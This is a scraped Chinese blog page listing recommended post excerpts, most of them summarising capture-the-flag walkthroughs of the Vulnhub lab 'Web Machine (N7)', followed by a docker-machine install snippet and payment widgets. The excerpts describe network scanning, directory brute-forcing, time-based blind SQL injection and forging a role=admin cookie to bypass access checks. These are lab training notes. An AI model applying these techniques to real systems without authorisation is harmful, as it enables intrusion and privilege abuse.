weixin_66249173的博客
01-31 334
得到一个Flag,但是发现这个Flag不完整。到这里线索就断了,看了其他师傅的文章发现到这里其实还有两条路可走。但是前提是必须能扫出enter_network这个目录,没扫出来说明字典还不够强大,所以有一个强大的字典是成功的前提。提交后会报错,并且发现域名变成了localhost。(这里要注意字典的使用,可以使用多个字典我这里使用的是kali自带的字典)环境就不说了,和之前的文章一样。发现一个文件提交界面,随便提交一个文件看看。发现目标,查看目标主机的服务和版本信息。发现有80端口,那就先访问一下。
web Machine(n7) 靶场实录
gaopan2667002的博客
09-01 187
反馈了一个flag 靶机的最终目的应该就是找到flag 本以为flag已经找到 到此结束,后来翻看了相关的攻略内容 发现这个flag只是其中的一半。后来查看时间盲注的内容,尝试了一下,send的时候sleep(5)执行了,并且等待了5秒页面才进行刷新。多了一个254的IP,查看了一下本机状态,除了kali以外就只有这个虚拟机是打开的。使用简单的tomcat字典爆破尝试,本机运行内存很小,速度很慢,所以没有选择大的字典。后来查看了虚拟机管理器的IP配置才想起来网段配的是56,并非之前一直使用的233。
web-machine(n7)--靶机练习
woshicainiao666的博客
12-19 424
arp-scan -l #扫描当前网段主机-A启用操作系统检测、脚本扫描和服务版本检测。这是一个综合性的选项,通常用于获取有关目标系统的详细信息-sC启用默认的脚本扫描,这些脚本在nmap中称为“脚本的默认类别”(default scripts category)。这些脚本执行各种任务,例如服务识别、漏洞检测等-sT使用 TCP 连接进行扫描。这表示nmap将使用经典的 TCP 连接来进行扫描,而不是其他可能的扫描技术-sV启用服务版本检测。这将尝试确定目标系统上运行的具体服务及其版本号。
[Vulnhub]靶场 Web Machine(N7)
最新发布
qq_34942239的博客
02-29 522
两次url解码->base64解密->md5碰撞得到的admin,并且无论上传什么user和pass,role都是admin。索性直接再admin.php界面添加cookie role=admin,结果拿到flag。在登录界面随便输入一组账号密码的时候,相应包的cookie里面有个role。偷看了一手WP,有个目录enter_network,该目录下有。cookie中添加role=admin拿到另一半flag。至于为什么添加role=admin。提示只有admin才能进入。给出了一半的flag。
docker-machine: not found
10-02
您遇到的问题"docker-machine: not found"是由于缺少Docker Machine命令行工具所致。为了解决这个问题,您需要先安装Docker Toolbox,它包含了Docker引擎、Kitematic和Compose等工具。根据您的操作系统,您可以从以下页面下载对应的Docker Toolbox版本: - 适用于Linux的docker machine安装: ``` curl -L https://github.com/docker/machine/releases/download/v0.16.2/docker-machine-`uname -s`-`uname -m` >/tmp/docker-machine && chmod +x /tmp/docker-machine && sudo cp /tmp/docker-machine /usr/local/bin/docker-machine ``` - 适用于OS X的docker machine安装: ``` curl -L https://github.com/docker/machine/releases/download/v0.16.2/docker-machine-`uname -s`-`uname -m` >/usr/local/bin/docker-machine && chmod +x /usr/local/bin/docker-machine ``` 安装完成后,您应该可以通过运行"docker-machine"命令来使用Docker Machine了。 希望这个解决方案对您有帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值